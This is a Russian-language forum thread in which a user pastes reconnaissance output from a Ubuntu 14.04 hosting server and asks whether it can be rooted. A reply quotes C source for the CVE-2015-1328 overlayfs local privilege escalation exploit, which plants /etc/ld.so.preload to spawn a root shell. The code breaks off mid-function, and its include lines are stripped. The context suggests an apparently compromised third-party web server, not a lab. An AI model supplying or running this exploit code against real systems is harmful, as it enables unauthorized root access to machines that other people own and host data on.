Сообщение от
d4rk73rr0r
↑
Подскажите пожалуйста, можно ли рутить этот сервер?
$ uname -a 2>&1
Код:
Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot 2>&1
Код:
total 652860
drwxr-xr-x 3 root root 12288 Jun 20 08:15 .
drwxr-xr-x 24 root root 4096 Jun 16 08:07 ..
-rw------- 1 root root 3372643 May 3 2014 System.map-3.13.0-24-generic
-rw------- 1 root root 3378267 Jun 5 2014 System.map-3.13.0-29-generic
-rw------- 1 root root 3378641 Jul 5 2014 System.map-3.13.0-30-generic
-rw------- 1 root root 3381262 Jul 15 2014 System.map-3.13.0-32-generic
-rw------- 1 root root 3381262 Jul 29 2014 System.map-3.13.0-33-generic
-rw------- 1 root root 3381262 Aug 13 2014 System.map-3.13.0-34-generic
-rw------- 1 root root 3386444 Aug 15 2014 System.map-3.13.0-35-generic
-rw------- 1 root root 3386479 Sep 4 2014 System.map-3.13.0-36-generic
-rw------- 1 root root 3386945 Sep 23 2014 System.map-3.13.0-37-generic
-rw------- 1 root root 3386936 Oct 28 2014 System.map-3.13.0-39-generic
-rw------- 1 root root 3387231 Nov 13 2014 System.map-3.13.0-40-generic
-rw------- 1 root root 3388792 Nov 25 2014 System.map-3.13.0-41-generic
-rw------- 1 root root 3388760 Dec 9 2014 System.map-3.13.0-43-generic
-rw------- 1 root root 3388834 Dec 16 2014 System.map-3.13.0-44-generic
-rw------- 1 root root 3389458 Mar 11 01:43 System.map-3.13.0-46-generic
-rw------- 1 root root 3389235 Mar 12 16:52 System.map-3.13.0-48-generic
-rw------- 1 root root 3389437 Apr 11 02:05 System.map-3.13.0-49-generic
-rw------- 1 root root 3389875 Apr 15 18:03 System.map-3.13.0-51-generic
-rw------- 1 root root 3389875 May 4 10:09 System.map-3.13.0-52-generic
-rw------- 1 root root 3390132 May 20 16:11 System.map-3.13.0-53-generic
-rw------- 1 root root 3390881 May 27 01:11 System.map-3.13.0-54-generic
-rw------- 1 root root 3390881 Jun 18 06:03 System.map-3.13.0-55-generic
-rw-r--r-- 1 root root 1158016 May 3 2014 abi-3.13.0-24-generic
-rw-r--r-- 1 root root 1161764 Jun 5 2014 abi-3.13.0-29-generic
-rw-r--r-- 1 root root 1162257 Jul 5 2014 abi-3.13.0-30-generic
-rw-r--r-- 1 root root 1162712 Jul 15 2014 abi-3.13.0-32-generic
-rw-r--r-- 1 root root 1162712 Jul 29 2014 abi-3.13.0-33-generic
-rw-r--r-- 1 root root 1162712 Aug 13 2014 abi-3.13.0-34-generic
-rw-r--r-- 1 root root 1163858 Aug 15 2014 abi-3.13.0-35-generic
-rw-r--r-- 1 root root 1163858 Sep 4 2014 abi-3.13.0-36-generic
-rw-r--r-- 1 root root 1164489 Sep 23 2014 abi-3.13.0-37-generic
-rw-r--r-- 1 root root 1164547 Oct 28 2014 abi-3.13.0-39-generic
-rw-r--r-- 1 root root 1164509 Nov 13 2014 abi-3.13.0-40-generic
-rw-r--r-- 1 root root 1164720 Nov 25 2014 abi-3.13.0-41-generic
-rw-r--r-- 1 root root 1164720 Dec 9 2014 abi-3.13.0-43-generic
-rw-r--r-- 1 root root 1164720 Dec 16 2014 abi-3.13.0-44-generic
-rw-r--r-- 1 root root 1164852 Mar 11 01:43 abi-3.13.0-46-generic
-rw-r--r-- 1 root root 1164723 Mar 12 16:52 abi-3.13.0-48-generic
-rw-r--r-- 1 root root 1164723 Apr 11 02:05 abi-3.13.0-49-generic
-rw-r--r-- 1 root root 1164671 Apr 15 18:03 abi-3.13.0-51-generic
-rw-r--r-- 1 root root 1164671 May 4 10:09 abi-3.13.0-52-generic
-rw-r--r-- 1 root root 1164671 May 20 16:11 abi-3.13.0-53-generic
-rw-r--r-- 1 root root 1164806 May 27 01:11 abi-3.13.0-54-generic
-rw-r--r-- 1 root root 1164806 Jun 18 06:03 abi-3.13.0-55-generic
-rw-r--r-- 1 root root 165510 May 3 2014 config-3.13.0-24-generic
-rw-r--r-- 1 root root 165544 Jun 5 2014 config-3.13.0-29-generic
-rw-r--r-- 1 root root 165576 Jul 5 2014 config-3.13.0-30-generic
-rw-r--r-- 1 root root 165611 Jul 15 2014 config-3.13.0-32-generic
-rw-r--r-- 1 root root 165611 Jul 29 2014 config-3.13.0-33-generic
-rw-r--r-- 1 root root 165611 Aug 13 2014 config-3.13.0-34-generic
-rw-r--r-- 1 root root 165652 Aug 15 2014 config-3.13.0-35-generic
-rw-r--r-- 1 root root 165671 Sep 4 2014 config-3.13.0-36-generic
-rw-r--r-- 1 root root 165712 Sep 23 2014 config-3.13.0-37-generic
-rw-r--r-- 1 root root 165712 Oct 28 2014 config-3.13.0-39-generic
-rw-r--r-- 1 root root 165745 Nov 13 2014 config-3.13.0-40-generic
-rw-r--r-- 1 root root 165745 Nov 25 2014 config-3.13.0-41-generic
-rw-r--r-- 1 root root 165745 Dec 9 2014 config-3.13.0-43-generic
-rw-r--r-- 1 root root 165748 Dec 16 2014 config-3.13.0-44-generic
-rw-r--r-- 1 root root 165748 Mar 11 01:43 config-3.13.0-46-generic
-rw-r--r-- 1 root root 165773 Mar 12 16:52 config-3.13.0-48-generic
-rw-r--r-- 1 root root 165773 Apr 11 02:05 config-3.13.0-49-generic
-rw-r--r-- 1 root root 165762 Apr 15 18:03 config-3.13.0-51-generic
-rw-r--r-- 1 root root 165762 May 4 10:09 config-3.13.0-52-generic
-rw-r--r-- 1 root root 165762 May 20 16:11 config-3.13.0-53-generic
-rw-r--r-- 1 root root 165762 May 27 01:11 config-3.13.0-54-generic
-rw-r--r-- 1 root root 165762 Jun 18 06:03 config-3.13.0-55-generic
drwxr-xr-x 5 root root 4096 Jun 20 08:15 grub
-rw-r--r-- 1 root root 19692919 Jun 25 2014 initrd.img-3.13.0-24-generic
-rw-r--r-- 1 root root 19693496 Jun 25 2014 initrd.img-3.13.0-29-generic
-rw-r--r-- 1 root root 19802843 Jul 10 2014 initrd.img-3.13.0-30-generic
-rw-r--r-- 1 root root 19805892 Jul 30 2014 initrd.img-3.13.0-32-generic
-rw-r--r-- 1 root root 19806330 Aug 12 2014 initrd.img-3.13.0-33-generic
-rw-r--r-- 1 root root 19807084 Aug 14 2014 initrd.img-3.13.0-34-generic
-rw-r--r-- 1 root root 19814700 Aug 29 2014 initrd.img-3.13.0-35-generic
-rw-r--r-- 1 root root 19827146 Sep 23 2014 initrd.img-3.13.0-36-generic
-rw-r--r-- 1 root root 19826914 Oct 9 2014 initrd.img-3.13.0-37-generic
-rw-r--r-- 1 root root 19826798 Oct 30 2014 initrd.img-3.13.0-39-generic
-rw-r--r-- 1 root root 19831562 Nov 25 2014 initrd.img-3.13.0-40-generic
-rw-r--r-- 1 root root 19857194 Dec 11 2014 initrd.img-3.13.0-41-generic
-rw-r--r-- 1 root root 19858798 Dec 12 2014 initrd.img-3.13.0-43-generic
-rw-r--r-- 1 root root 19860064 Jan 13 2015 initrd.img-3.13.0-44-generic
-rw-r--r-- 1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic
-rw-r--r-- 1 root root 19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic
-rw-r--r-- 1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic
-rw-r--r-- 1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic
-rw-r--r-- 1 root root 19865264 May 7 08:07 initrd.img-3.13.0-52-generic
-rw-r--r-- 1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic
-rw-r--r-- 1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic
-rw-r--r-- 1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic
-rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin
-rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf
-rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin
-rw------- 1 root root 5776416 May 3 2014 vmlinuz-3.13.0-24-generic
-rw------- 1 root root 5792544 Jun 5 2014 vmlinuz-3.13.0-29-generic
-rw------- 1 root root 5792608 Jul 5 2014 vmlinuz-3.13.0-30-generic
-rw------- 1 root root 5798112 Jul 15 2014 vmlinuz-3.13.0-32-generic
-rw------- 1 root root 5798688 Jul 29 2014 vmlinuz-3.13.0-33-generic
-rw------- 1 root root 5797728 Aug 13 2014 vmlinuz-3.13.0-34-generic
-rw------- 1 root root 5806368 Aug 15 2014 vmlinuz-3.13.0-35-generic
-rw------- 1 root root 5806848 Sep 4 2014 vmlinuz-3.13.0-36-generic
-rw------- 1 root root 5808832 Sep 23 2014 vmlinuz-3.13.0-37-generic
-rw------- 1 root root 5808544 Oct 28 2014 vmlinuz-3.13.0-39-generic
-rw------- 1 root root 5808960 Nov 13 2014 vmlinuz-3.13.0-40-generic
-rw------- 1 root root 5814112 Nov 25 2014 vmlinuz-3.13.0-41-generic
-rw------- 1 root root 5814080 Dec 9 2014 vmlinuz-3.13.0-43-generic
-rw------- 1 root root 5814496 Dec 16 2014 vmlinuz-3.13.0-44-generic
-rw------- 1 root root 5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic
-rw------- 1 root root 5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic
-rw------- 1 root root 5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic
-rw------- 1 root root 5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic
-rw------- 1 root root 5818592 May 4 10:09 vmlinuz-3.13.0-52-generic
-rw------- 1 root root 5821152 May 20 16:11 vmlinuz-3.13.0-53-generic
-rw------- 1 root root 5821664 May 27 01:11 vmlinuz-3.13.0-54-generic
-rw------- 1 root root 5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic
ls -la --full-time /lib 2>&1
Код:
total 312
drwxr-xr-x 23 root root 4096 2015-02-27 08:01:04.121244740 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
drwxr-xr-x 2 root root 4096 2014-11-21 07:40:33.676606953 +0500 apparmor
lrwxrwxrwx 1 root root 21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp
drwxr-xr-x 3 root root 4096 2014-06-24 11:04:14.153311413 +0500 crda
drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware
drwxr-xr-x 2 root root 4096 2014-06-24 11:08:09.613305094 +0500 hdparm
drwxr-xr-x 2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu
drwxr-xr-x 2 root root 4096 2014-06-27 11:51:14.108394221 +0500 ifupdown
drwxr-xr-x 2 root root 4096 2014-07-30 11:27:25.309402444 +0500 init
-rwxr-xr-x 1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so
lrwxrwxrwx 1 root root 25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so
lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r-- 1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0
drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 lsb
drwxr-xr-x 2 root root 4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:17.752507007 +0500 modules
drwxr-xr-x 2 root root 4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d
drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 plymouth
drwxr-xr-x 3 root root 4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode
drwxr-xr-x 2 root root 4096 2014-06-27 11:51:03.188394514 +0500 resolvconf
drwxr-xr-x 2 root root 4096 2014-07-11 15:54:31.320044515 +0500 security
drwxr-xr-x 3 root root 4096 2014-07-10 17:19:11.242226794 +0500 systemd
drwxr-xr-x 15 root root 4096 2014-06-24 11:03:45.029312194 +0500 terminfo
drwxr-xr-x 4 root root 4096 2014-07-11 15:54:50.304044005 +0500 udev
drwxr-xr-x 2 root root 4096 2014-06-24 11:12:34.149297995 +0500 ufw
drwxr-xr-x 4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2014-06-24 11:08:13.173304998 +0500 xtables
ls -la --full-time /lib64 2>&1
Код:
total 8
drwxr-xr-x 2 root root 4096 2015-02-27 08:01:05.833244694 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
lrwxrwxrwx 1 root root 32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
$ mount 2>&1
Код:
/dev/md0 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/md1 on /opt type ext4 (rw,usrquota)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)
$ df -h 2>&1
Код:
Filesystem Size Used Avail Use% Mounted on
/dev/md0 459G 215G 221G 50% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
udev 3.8G 4.0K 3.8G 1% /dev
tmpfs 768M 1.8M 767M 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 3.8G 16K 3.8G 1% /run/shm
none 100M 0 100M 0% /run/user
/dev/md1 1.8T 48G 1.7T 3% /opt
$ cat /etc/issue 2>&1
Код:
Ubuntu 14.04.1 LTS \n \l
$ cat /etc/crontab 2>&1
Код:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
# ClamAV refresh virus databases
30 1 * * * root freshclam >/dev/null 2>&1
# ClamAV checking vhosts directory and sending email to admins
0 2 * * * root /adm/clamav.sh >/dev/null 2>&1
$ ls -la /etc/cron.d 2>&1
Код:
total 44
drwxr-xr-x 2 root root 4096 Apr 21 08:16 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rw------- 1 root root 260 Jul 11 2014 awstats
-rw-r--r-- 1 root root 1566 Feb 3 2014 mailman
-rw-r--r-- 1 root root 589 Feb 28 2014 mdadm
-rw-r--r-- 1 root root 510 Jul 7 2014 php5
-rw-r--r-- 1 root root 110 Jul 11 2014 plesk-backup-manager-task
-rw-r--r-- 1 root root 156 Aug 7 2014 plesk-outgoing-mail-statistics-poller
$ ls -la /etc/cron.hourly 2>&1
Код:
total 20
drwxr-xr-x 2 root root 4096 Jun 24 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
$ ls -la /etc/cron.monthly 2>&1
Код:
total 24
drwxr-xr-x 2 root root 4096 Jul 11 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 190 Jun 25 2014 50plesk-monthly
$ ls -la /etc/cron.weekly 2>&1
Код:
total 40
drwxr-xr-x 2 root root 4096 Jul 11 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 189 Jun 25 2014 50plesk-weekly
-rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
-rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
-rwxr-xr-x 1 root root 771 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 211 Apr 10 2014 update-notifier-common
$ cat /proc/version 2>&1
Код:
Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014
$ cat /proc/sys/vm/mmap_min_addr 2>&1
$ ls -la /usr/bin/staprun 2>&1
Код:
ls: cannot access /usr/bin/staprun: No such file or directory
$ pwd 2>&1
Код:
/opt/www/vhosts/hostname.domain/logs
[CODE]
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000( user)
greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
static char child_stack[1024*1024];
static int
child_exec(void *stuff)
{
char *file;
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);
fprintf(stderr,"mount #1\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";
chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");
chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}
int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;
fprintf(stderr,"spawning threads\n");
if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");
if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid
Древовидный вид